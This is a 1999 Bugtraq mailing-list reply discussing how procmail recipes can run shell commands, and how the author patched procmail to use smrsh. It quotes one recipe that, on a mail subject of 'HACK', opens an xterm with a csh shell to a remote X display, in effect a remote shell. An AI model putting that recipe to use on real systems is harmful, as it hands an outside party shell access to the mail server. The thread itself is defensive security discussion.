Bugtraq mailing list archives
Re: More procmail
From: lindsey () MALLORN COM (Christopher P. Lindsey)
Date: Wed, 7 Apr 1999 12:51:20 -0500
:0 * ^Subject: HACK | setenv DISPLAY beida:0;/usr/openwin/bin/xterm -e /bin/csh I have patched my procmail to deal with this by forcing it to use smrsh. In doing so, I also discovered the procmail calls sendmail explicitly at some point in it's operation (didn't take the time to figure out where it does it). This might also be of concern, but it wasn't immediately obvious to me how this might be exploited.
Exactly, and I've been debating this with Philip for quite some time now. I'm not saying that either one of us is right, but this type of problem is particularly worrisome in our environment at NCSA. I also wrote a patch about a year ago (or maybe it's the one that you used) against 3.11pre7, available at http://mirror.ncsa.uiuc.edu/procmail/patches/smrsh-like.patch I'll be writing one for 3.13.x and adding the same functionality to formail when I have the time. Chris
Current thread:
- More procmail Chris Evans (Apr 05)
- Re: More procmail Philip Guenther (Apr 06)
- Adobe put Trojan horse in Acrobat. Bob Zoller (Apr 06)
- Re: More procmail Ricky Connell (Apr 07)
- Re: More procmail Christopher P. Lindsey (Apr 07)
- <Possible follow-ups>
- Re: more procmail Kragen Sitaker (Apr 06)
- Re: More procmail Philip Guenther (Apr 06)